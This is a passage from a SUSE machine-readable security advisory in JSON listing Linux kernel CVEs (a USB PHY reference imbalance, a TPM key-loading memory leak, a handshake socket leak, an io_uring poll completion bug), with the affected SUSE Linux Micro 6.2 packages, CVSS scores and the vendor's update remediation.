"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71143"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: restore destructor on submit failure\n\nhandshake_req_submit() replaces sk-\u003esk_destruct but never restores it when\nsubmission fails before the request is hashed. handshake_sk_destruct() then\nreturns early and the original destructor never runs, leaking the socket.\nRestore sk_destruct on the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71148",
"url": "https://www.suse.com/security/cve/CVE-2025-71148"
},
{
"category": "external",
"summary": "SUSE Bug 1257159 for CVE-2025-71148",
"url": "https://bugzilla.suse.com/1257159"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71148"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
